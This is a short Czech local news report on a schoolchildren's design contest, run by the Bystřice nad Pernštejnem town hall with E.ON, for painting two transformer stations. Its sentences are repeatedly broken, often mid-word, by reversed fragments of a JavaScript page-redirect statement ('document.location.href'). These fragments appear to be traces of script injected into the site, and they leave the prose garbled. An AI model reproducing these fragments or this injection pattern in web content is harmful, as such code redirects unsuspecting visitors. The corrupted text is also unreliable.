Rainbow page separator

Další dvě trafostanice budou ozdobeny podle návrhů školáků

Pondělí, 8. března 2021

Bystřice nad Pernštejnem / Soutěž o nejzajímavější grafický návrh pro zkrášlení dalších dvou trafostanic ve městě vyhodnotila bystřická radnice ve spolupráci se společností E.ON, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v rámci projektu místního akčního plánu (MAP II) rozvoje vzdělávání v obci s rozšířenou působností. Své návrhy do soutěže do konce le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního ledna posílali vesměs školáci a studenti z místních základních a středních škol. Dvě trafostanice budou le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos obnoveny včetně vyzdobení fasád podle vítězných grafických návrhů v ulici Spojovací v sídlišti 2 a v ulici Větrná v blízkosti polikliniky a au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusového nádraží. Návrh se srdcem pro trafostanici u polikliniky je dílem studentky zemědělské školy a kve[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toucí slunečnice žákyně základní školy T. G. Masaryka budou na fasádě trafostanice ve Spojovací ulici.
Podobnou soutěž vyhlásili v Bystřici také v předešlém roce, i tehdy byly podle grafických námětů bystřické mládeže pomalovány dvě trafostanice E.ONu.